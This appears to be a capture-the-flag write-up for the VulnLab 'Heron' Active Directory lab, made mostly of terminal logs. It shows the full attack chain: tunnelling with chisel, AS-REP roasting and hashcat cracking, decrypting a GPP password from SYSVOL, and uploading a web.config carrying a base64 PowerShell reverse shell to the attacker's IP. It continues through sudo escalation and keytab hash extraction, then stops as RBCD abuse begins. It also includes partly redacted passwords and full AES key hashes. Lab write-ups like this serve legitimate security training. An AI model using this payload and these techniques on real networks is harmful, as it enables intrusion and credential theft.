┌──(puck㉿kali)-[~/vulnlab/heron] └─$ chisel server -p 8000 --reverse 2024/08/02 14:29:11 server: Reverse tunnelling enabled 2024/08/02 14:29:11 server: Fingerprint eyu7C2ldEm70kbrgTg7RsaykP56cSgqwu7GXCH17JyM= 2024/08/02 14:29:11 server: Listening on http://0.0.0.0:8000 2024/08/02 14:30:12 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening
.
┌──(puck㉿kali)-[~/vulnlab/heron] └─$ ssh pentest@10.10.148.86 The authenticity of host '10.10.148.86 (10.10.148.86)' can't be established. ED25519 key fingerprint is SHA256:7vUA9tMchnLRfzMzAtJD+Hwwr0nppIBRhctvevOQbm0. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.148.86' (ED25519) to the list of known hosts. **************************************************** * Welcome to Heron Corp * * Unauthorized access to 'frajmp.heron.vl' is * * forbidden and will be prosecuted by law. * **************************************************** (pentest@10.10.148.86) Password: Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-107-generic x86_64) System information as of Fri Aug 2 12:24:16 PM UTC 2024 System load: 0.0 Processes: 110 Usage of /: 44.8% of 9.75GB Users logged in: 0 Memory usage: 23% IPv4 address for ens5: 10.10.148.86 Swap usage: 0% Last login: Fri Jun 7 10:34:38 2024 from 10.8.0.101 pentest@frajmp:~$ who pentest pts/0 2024-08-02 12:24 (10.8.2.138) pentest@frajmp:~$ cd /tmp pentest@frajmp:/tmp$ wget http://10.8.2.138/chisel --2024-08-02 12:28:23-- http://10.8.2.138/chisel Connecting to 10.8.2.138:80... connected. HTTP request sent, awaiting response... 200 OK Length: 8711104 (8.3M) [application/octet-stream] Saving to: ‘chisel’ chisel 100%[=======================>] 8.31M 6.88MB/s in 1.2s 2024-08-02 12:28:25 (6.88 MB/s) - ‘chisel’ saved [8711104/8711104] pentest@frajmp:/tmp$ chmod +x chisel pentest@frajmp:/tmp$ ./chisel client 10.8.2.138:8000 R:socks 2024/08/02 12:30:11 client: Connecting to ws://10.8.2.138:8000 2024/08/02 12:30:12 client: Connected (Latency 20.482852ms)
We do a slow nmap scan over proxychains to the DC
┌──(puck㉿kali)-[~/vulnlab/heron] └─$ proxychains nmap -sC -sV -oN herondc.nmap -p 80,445,389,53,135,3389,443,21 10.10.148.85 [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-02 14:47 CEST [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:80 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:53 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:135 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:80 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:3389 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:443 <--socket error or timeout! [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:21 <--socket error or timeout! [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:389 ... OK Nmap scan report for 10.10.148.85 Host is up (0.062s latency). PORT STATE SERVICE VERSION 21/tcp closed ftp 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-title: Heron Corp |_http-server-header: Microsoft-IIS/10.0 135/tcp open msrpc Microsoft Windows RPC 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: heron.vl0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=mucdc.heron.vl | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:mucdc.heron.vl | Not valid before: 2024-06-01T15:29:52 |_Not valid after: 2025-06-01T15:29:52 |_ssl-date: TLS randomness does not represent time 443/tcp closed https 445/tcp open microsoft-ds Windows Server 2022 Standard 20348 microsoft-ds (workgroup: HERON) 3389/tcp open ms-wbt-server Microsoft Terminal Services |_ssl-date: 2024-08-02T12:49:19+00:00; -2s from scanner time. | rdp-ntlm-info: | Target_Name: HERON | NetBIOS_Domain_Name: HERON | NetBIOS_Computer_Name: MUCDC | DNS_Domain_Name: heron.vl | DNS_Computer_Name: mucdc.heron.vl | DNS_Tree_Name: heron.vl | Product_Version: 10.0.20348 |_ System_Time: 2024-08-02T12:49:08+00:00 | ssl-cert: Subject: commonName=mucdc.heron.vl | Not valid before: 2024-06-01T10:54:12 |_Not valid after: 2024-12-01T10:54:12 Service Info: Host: MUCDC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2024-08-02T12:49:12 |_ start_date: N/A | smb-security-mode: | account_used: <blank> | authentication_level: user | challenge_response: supported |_ message_signing: required | smb2-security-mode: | 311: |_ Message signing enabled and required |_clock-skew: mean: 1h23m58s, deviation: 3h07m51s, median: -2s | smb-os-discovery: | OS: Windows Server 2022 Standard 20348 (Windows Server 2022 Standard 6.3) | Computer name: mucdc | NetBIOS computer name: MUCDC\x00 | Domain name: heron.vl | Forest name: heron.vl | FQDN: mucdc.heron.vl |_ System time: 2024-08-02T05:49:10-07:00 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 87.02 seconds ┌──(puck㉿kali)-[~/vulnlab/heron]
.
on open port 80 we do a curl and find some usernames
┌──(puck㉿kali)-[~/vulnlab/heron] └─$ proxychains4 curl http://10.10.148.85 [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:80 ... OK <!DOCTYPE html> <html lang="en"> <body> <div class="container mt-5"> <div class="text-center mb-4"> <h1 class="display-4 text-white">Heron Corp</h1> <p class="lead text-white">Building the future of aerospace with precision and innovation.</p> <h5 class="card-title">Wayne Wood</h5> <p class="card-text">CEO</p> <p>Email: wayne.wood@heron.vl</p> <h5 class="card-title">Julian Pratt</h5> <p class="card-text">Head of IT</p> <p>Email: julian.pratt@heron.vl</p> <i class="fas fa-user-tie fa-3x mb-3"></i> <h5 class="card-title">Samuel Davies</h5> <p class="card-text">Accounting</p> <p>Email: samuel.davies@heron.vl</p> </body> </html> ┌──(puck㉿kali)-[~/vulnlab/heron]
We add to our /etc/hosts
10.10.148.85 mucdc.heron.vl heron.vl
…
Check for vuln ASREProasting users ( meaning AD account with option set : Do not require Kerberos preauthetication )
┌──(puck㉿kali)-[~/vulnlab/heron] └─$ proxychains4 impacket-GetNPUsers heron.vl/'Guest' -dc-ip 10.10.148.85 -no-pass -request -usersfile users.txt [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 [proxychains] DLL init: proxychains-ng 4.17 [proxychains] DLL init: proxychains-ng 4.17 Impacket v0.12.0.dev1 - Copyright 2023 Fortra [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK [-] User svc-web-accounting-d doesn't have UF_DONT_REQUIRE_PREAUTH set [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK [-] User svc-web-accounting doesn't have UF_DONT_REQUIRE_PREAUTH set [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK [-] User wayne.wood doesn't have UF_DONT_REQUIRE_PREAUTH set [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK [-] User julian.pratt doesn't have UF_DONT_REQUIRE_PREAUTH set [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK $krb5asrep$23$samuel.davies@HERON.VL:5253809049f054f80bde543e1a85bd56$d72a41d4e4a470a8abb50153b4cf1b365c82e8d0be2c8b376559f2ceaeda11962b2ca2eb37e0fa3feae5cad46f8da6c4abc5d15c32a2b66651c5846f21755d587d8996a83f9e34bddd777f420f6da1061da0c33fd594c0432c9cf69ad6fb7c881858578ca9870cefffaf7c0a34f9deca4209cdf8a0e0a9b971a32e01744bc98c1f69d1dfd32d19e95124c7f9603adc9b139971aad3354ea4e2a1d1e23df6bb70fa57d9e967c98972058a1510e3b8f5ff0c55e45f35478fa0437e1119d2ad36e4d54d2695a6f545ea0a8f46b3b053a154f61d66fa8755d7d8676d71ec6f45aa40163b2101 [-] invalid principal syntax ┌──(puck㉿kali)-[~/vulnlab/heron]
We crack this with hashcat , AS-REP Roasting uses hashcat mode 18200
┌──(puck㉿kali)-[~/vulnlab/heron] └─$ hashcat -m 18200 -o cracked4.txt hash /usr/share/wordlists/rockyou.txt hashcat (v6.2.6) starting Host memory required for this attack: 2 MB Dictionary cache hit: * Filename..: /usr/share/wordlists/rockyou.txt * Passwords.: 14344385 * Bytes.....: 139921507 * Keyspace..: 14344385 Session..........: hashcat Status...........: Cracked Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP) Hash.Target......: $krb5asrep$23$samuel.davies@HERON.VL:5253809049f054...3b2101 Time.Started.....: Fri Aug 2 15:06:30 2024 (0 secs) Time.Estimated...: Fri Aug 2 15:06:30 2024 (0 secs) Kernel.Feature...: Pure Kernel Guess.Base.......: File (/usr/share/wordlists/rockyou.txt) Started: Fri Aug 2 15:06:29 2024 Stopped: Fri Aug 2 15:06:32 2024
With the pass found, we do a bloodhound enum
┌──(puck㉿kali)-[~/vulnlab/heron] └─$ proxychains4 bloodhound-python -d 'heron.vl' -u 'samuel.davies' -p 'l6<redacted>oN' -c all -ns 10.10.148.85 --zip [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 INFO: Found AD domain: heron.vl INFO: Getting TGT for user [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK INFO: Connecting to LDAP server: mucdc.heron.vl [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:389 ... OK INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Found 5 computers INFO: Connecting to LDAP server: mucdc.heron.vl [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:389 ... OK INFO: Found 28 users INFO: Found 59 groups INFO: Found 5 gpos INFO: Found 4 ous INFO: Found 19 containers INFO: Found 0 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: frajmp.heron.vl INFO: Querying computer: INFO: Querying computer: [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.86:445 INFO: Querying computer: INFO: Querying computer: mucdc.heron.vl [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:445 <--socket error or timeout! ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:88 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:445 ... OK INFO: Done in 00M 07S INFO: Compressing output into 20240802151131_bloodhound.zip
Getting more users with ldapdump
┌──(puck㉿kali)-[~/vulnlab/heron] └─$ proxychains4 ldapsearch -x -LLL -H ldap://mucdc.heron.vl -D 'samuel.davies@heron.vl' -b 'DC=heron,DC=vl' -w 'l6<redacted>oN' | grep userPrincipalName | awk '{print $2}' | cut -d '@' -f 1 > allusers.txt [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:389 ... OK
SMB enum
┌──(puck㉿kali)-[~/vulnlab/heron] └─$ proxychains4 smbclient -L 10.10.148.85 -U 'samuel.davies' [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:445 ... OK Password for [WORKGROUP\samuel.davies]: Sharename Type Comment --------- ---- ------- accounting$ Disk ADMIN$ Disk Remote Admin C$ Disk Default share CertEnroll Disk Active Directory Certificate Services share home$ Disk IPC$ IPC Remote IPC it$ Disk NETLOGON Disk Logon server share SYSVOL Disk Logon server share transfer$ Disk Reconnecting with SMB1 for workgroup listing. [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:139 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:139 ... OK do_connect: Connection to 10.10.148.85 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available
Connect to smb we find group.xml with a pasword in it
┌──(puck㉿kali)-[~/vulnlab/heron] └─$ proxychains4 smbclient \\\\10.10.148.85\\SYSVOL -U 'samuel.davies' [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 Password for [WORKGROUP\samuel.davies]: [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:445 ... OK Try "help" to get a list of possible commands. smb: \> ls . D 0 Sun May 26 11:37:40 2024 .. D 0 Sun May 26 11:37:40 2024 heron.vl Dr 0 Sun May 26 11:37:40 2024 6261499 blocks of size 4096. 1958913 blocks available smb: \> cd heron.vl smb: \heron.vl\> ls . D 0 Sun May 26 11:38:59 2024 .. D 0 Sun May 26 11:37:40 2024 DfsrPrivate DHSr 0 Sun May 26 11:38:59 2024 Policies D 0 Tue Jun 4 17:57:41 2024 scripts D 0 Sun Jun 2 12:42:56 2024 6261499 blocks of size 4096. 1958913 blocks available smb: \heron.vl\> cd Policies smb: \heron.vl\Policies\> ls . D 0 Tue Jun 4 17:57:41 2024 .. D 0 Sun May 26 11:38:59 2024 {31B2F340-016D-11D2-945F-00C04FB984F9} D 0 Sun May 26 11:37:44 2024 {3FFDA928-A6D1-4860-936F-25D9D2D7EAEF} D 0 Sun May 26 12:21:54 2024 {6AC1786C-016F-11D2-945F-00C04fB984F9} D 0 Sun May 26 11:37:44 2024 {6CC75E8D-586E-4B13-BF80-B91BEF1F221C} D 0 Tue Jun 4 17:57:41 2024 {866ECED1-24B0-46EF-92F5-652345A1820C} D 0 Sun May 26 12:23:29 2024 6261499 blocks of size 4096. 1958912 blocks available smb: \heron.vl\Policies\> cd {6CC75E8D-586E-4B13-BF80-B91BEF1F221C} smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\> ls . D 0 Tue Jun 4 17:57:41 2024 .. D 0 Tue Jun 4 17:57:41 2024 GPT.INI A 59 Tue Jun 4 18:00:13 2024 Machine D 0 Tue Jun 4 17:59:44 2024 User D 0 Tue Jun 4 17:57:41 2024 6261499 blocks of size 4096. 1958910 blocks available smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\> cd Machine smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\> ls . D 0 Tue Jun 4 17:59:44 2024 .. D 0 Tue Jun 4 17:57:41 2024 Preferences D 0 Tue Jun 4 17:59:44 2024 6261499 blocks of size 4096. 1958908 blocks available smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\> cd Preferences smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\> ls . D 0 Tue Jun 4 17:59:44 2024 .. D 0 Tue Jun 4 17:59:44 2024 Groups D 0 Tue Jun 4 17:59:44 2024 6261499 blocks of size 4096. 1958908 blocks available smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\> cd Groups smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\Groups\> ls . D 0 Tue Jun 4 17:59:44 2024 .. D 0 Tue Jun 4 17:59:44 2024 Groups.xml A 1135 Tue Jun 4 18:01:07 2024 6261499 blocks of size 4096. 1958908 blocks available smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\Groups\> get Groups.xml getting file \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\Groups\Groups.xml of size 1135 as Groups.xml (13.2 KiloBytes/sec) (average 13.2 KiloBytes/sec) smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\Groups\>
Gppencrypt pw [
pip3 install pycryptodome colorama
puck@edge-meppel:~/gpp-decrypt$ python3 gpp-decrypt.py __ __ ___ _ ___ ___ ____ ___/ / ___ ____ ____ __ __ ___ / /_ / _ `/ / _ \ / _ \/___// _ / / -_)/ __/ / __/ / // / / _ \/ __/ \_, / / .__/ / .__/ \_,_/ \__/ \__/ /_/ \_, / / .__/\__/ /___/ /_/ /_/ /___/ /_/ usage: python3 gpp-decrypt.py -f [groups.xml] gpp-decrypt.py: error: one of the arguments -f/--file -c/--cpassword is required puck@edge-meppel:~/gpp-decrypt$ python3 gpp-decrypt.py -c 1G19pP9gbIPUr5xLeKhEUg== __ __ ___ _ ___ ___ ____ ___/ / ___ ____ ____ __ __ ___ / /_ / _ `/ / _ \ / _ \/___// _ / / -_)/ __/ / __/ / // / / _ \/ __/ \_, / / .__/ / .__/ \_,_/ \__/ \__/ /_/ \_, / / .__/\__/ /___/ /_/ /_/ /___/ /_/ [ * ] Password: H3<redacted>#! puck@edge-meppel:~/gpp-decrypt$
with the H3<redacted>#! pass , valid for user svc-web-accounting-d , we can access SMB
┌──(puck㉿kali)-[~/vulnlab/heron] └─$ proxychains4 smbclient \\\\10.10.148.85\\accounting$ -U 'svc-web-accounting-d' [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 Password for [WORKGROUP\svc-web-accounting-d]:H3r<redacted>#! [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.148.85:445 ... OK Try "help" to get a list of possible commands. smb: \> ls . D 0 Fri Jun 7 08:14:04 2024 .. DHS 0 Sun Jun 2 17:26:14 2024 AccountingApp.deps.json A 37407 Sun Jun 2 21:25:26 2024 AccountingApp.dll A 89600 Sun Jun 2 21:25:26 2024 AccountingApp.exe A 140800 Sun Jun 2 21:25:26 2024 AccountingApp.pdb A 39488 Sun Jun 2 21:25:26 2024 AccountingApp.runtimeconfig.json A 557 Sun Jun 2 00:22:20 2024 appsettings.Development.json A 127 Sun Jun 2 00:00:54 2024 appsettings.json A 237 Sun Jun 2 00:03:50 2024 FinanceApp.db A 106496 Sat Jun 1 16:09:00 2024 Microsoft.AspNetCore.Authentication.Negotiate.dll A 53920 Wed Nov 1 10:08:26 2023 Microsoft.AspNetCore.Cryptography.Internal.dll A 52912 Mon May 20 14:23:52 2024 Microsoft.AspNetCore.Cryptography.KeyDerivation.dll A 23712 Mon May 20 14:23:56 2024 Microsoft.AspNetCore.Identity.EntityFrameworkCore.dll A 108808 Mon May 20 14:24:24 2024 Microsoft.Data.Sqlite.dll A 172992 Mon May 20 09:54:40 2024 Microsoft.EntityFrameworkCore.Abstractions.dll A 34848 Mon May 20 09:54:30 2024 Microsoft.EntityFrameworkCore.dll A 2533312 Mon May 20 09:55:04 2024 Microsoft.EntityFrameworkCore.Relational.dll A 1991616 Mon May 20 09:55:20 2024 Microsoft.EntityFrameworkCore.Sqlite.dll A 257456 Mon May 20 09:55:30 2024 Microsoft.Extensions.DependencyModel.dll A 79624 Tue Oct 31 23:59:24 2023 Microsoft.Extensions.Identity.Core.dll A 177840 Mon May 20 14:24:10 2024 Microsoft.Extensions.Identity.Stores.dll A 45232 Mon May 20 14:24:20 2024 Microsoft.Extensions.Options.dll A 64776 Thu Jan 18 12:05:26 2024 runtimes D 0 Sat Jun 1 16:51:32 2024 SQLitePCLRaw.batteries_v2.dll A 5120 Thu Aug 24 04:41:24 2023 SQLitePCLRaw.core.dll A 50688 Thu Aug 24 04:38:38 2023 SQLitePCLRaw.provider.e_sqlite3.dll A 35840 Thu Aug 24 04:38:52 2023 System.DirectoryServices.Protocols.dll A 71944 Wed Nov 1 00:00:24 2023 web.config A 554 Thu Jun 6 16:41:39 2024 wwwroot D 0 Sat Jun 1 16:51:32 2024 6261499 blocks of size 4096. 1957663 blocks available smb: \>
.
We remove web.config, and then upload a modified web.config
i used this one
<?xml version="1.0" encoding="utf-8"?> <configuration> <location path="." inheritInChildApplications="false"> <system.webServer> <handlers> <add name="aspNetCore" path="execute.now" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" /> </handlers> <aspNetCore processPath="powershell" arguments="-e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AOAAuADIALgAxADMAOAAiACwAOQAwADAAMQApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=" hostingModel="OutOfProcess" /> </system.webServer> </location> </configuration> <!--ProjectGuid: 803424B4-7DFD-4F1E-89C7-4AAC782C27C4-->
Then i did a proxychains Firefox to http://accounting.heron.vl
logged in as svc-web-accounting-d with the H3<redacted>#! pasword, and then visited http://accounting.heron.vl/execute.now to trigger
or do a curl like this
┌──(puck㉿kali)-[~/vulnlab/heron] └─$ proxychains curl -u:svc-web-accounting:H3<redacted>#! http://accounting.heron.vl/execute.now [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 [proxychains] Strict chain ... 127.0.0.1:1080 ... accounting.heron.vl:80 ... OK
and catched the rev shell back to my kali box
┌──(puck㉿kali)-[~/vulnlab/heron] └─$ nc -nlvp 9001 listening on [any] 9001 ... connect to [10.8.2.138] from (UNKNOWN) [10.10.177.37] 58560 PS C:\webaccounting> cd c:\windows\scripts PS C:\windows\scripts> dir Directory: C:\windows\scripts Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 6/6/2024 7:12 AM 1416 dns.ps1 -a---- 6/1/2024 8:26 AM 221 ssh.ps1 PS C:\windows\scripts> type ssh.ps1 $plinkPath = "C:\Program Files\PuTTY\plink.exe" $targetMachine = "frajmp" $user = "_local" $password = "De<redacted>lt" & "$plinkPath" -ssh -batch $user@$targetMachine -pw $password "ps auxf; ls -lah /home; exit" PS C:\windows\scripts>
checked Defender is running Get-MpComputerStatus on MUCDC, killing session after about 1 min, so visited http://accounting.heron.vl/execute.now again if ya need more time…
privesc on ubuntu box
pentest@frajmp:/tmp$ su _local Password: _local@frajmp:/tmp$ sudo -l [sudo] password for _local: Matching Defaults entries for _local on localhost: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty User _local may run the following commands on localhost: (ALL : ALL) ALL _local@frajmp:/tmp$ sudo su root@frajmp:/tmp# cd /root root@frajmp:~# ls flag.txt snap root@frajmp:~# cat flag.txt VL{51<redacted>60}
transfer /etc/krb5.keytab with nc to kali box, and do a keytabextract.py
──(puck㉿kali)-[~/vulnlab/heron] └─$ python3 keytabextract.py krb5.keytab [*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash. [*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction. [*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction. [+] Keytab File successfully imported. REALM : HERON.VL SERVICE PRINCIPAL : FRAJMP$/ NTLM HASH : 6f<redacted>f7 AES-256 HASH : 7be44e62e24ba5f4a5024c185ade0cd3056b600bb9c69f11da3050dd586130e7 AES-128 HASH : dcaaea0cdc4475eee9bf78e6a6cbd0cd
We do some more Enumeration …finding Depl<redacted>Dealt working for julian.pratt
┌──(puck㉿kali)-[~/vulnlab/heron] └─$ proxychains4 smbclient \\\\10.10.134.197\\home$ -U 'julian.pratt' [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 Password for [WORKGROUP\julian.pratt]: Depl<redacted>Dealt [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.134.197:445 ... OK Try "help" to get a list of possible commands. smb: \> smb: \> cd Julian.Pratt smb: \Julian.Pratt\> dir . D 0 Sun Jun 2 12:47:14 2024 .. D 0 Sat Jun 1 17:10:46 2024 frajmp.lnk A 1443 Sun Jun 2 12:47:47 2024 Is there a way to -auto login- in PuTTY with a password- - Super User.url A 117 Sat Jun 1 17:44:44 2024 Microsoft Edge.lnk A 2312 Sat Jun 1 17:44:38 2024 mucjmp.lnk A 1441 Sun Jun 2 12:47:33 2024 6261499 blocks of size 4096. 1985339 blocks available smb: \Julian.Pratt\> mget *.lnk Get file frajmp.lnk? y getting file \Julian.Pratt\frajmp.lnk of size 1443 as frajmp.lnk (17.2 KiloBytes/sec) (average 17.2 KiloBytes/sec) Get file Microsoft Edge.lnk? y getting file \Julian.Pratt\Microsoft Edge.lnk of size 2312 as Microsoft Edge.lnk (26.9 KiloBytes/sec) (average 22.1 KiloBytes/sec) Get file mucjmp.lnk? y getting file \Julian.Pratt\mucjmp.lnk of size 1441 as mucjmp.lnk (17.8 KiloBytes/sec) (average 20.7 KiloBytes/sec) smb: \Julian.Pratt\>
.
From bloodhoud, We find adm_prju
is within the ADMINS_T1
group, they have the WriteAccountRestrictions
privilege over MUCDC.
Having WriteAccountRestrictions
means that adm_prju
has write access to all of the attributes on the machine, notably msDS-AllowedToActOnBehalfOfOtherIdentity
. If we have the ability to modify this attribute, we can abuse resource-based constrained delegation
Next do the RBCD ( Role Based Constrained Delegation )
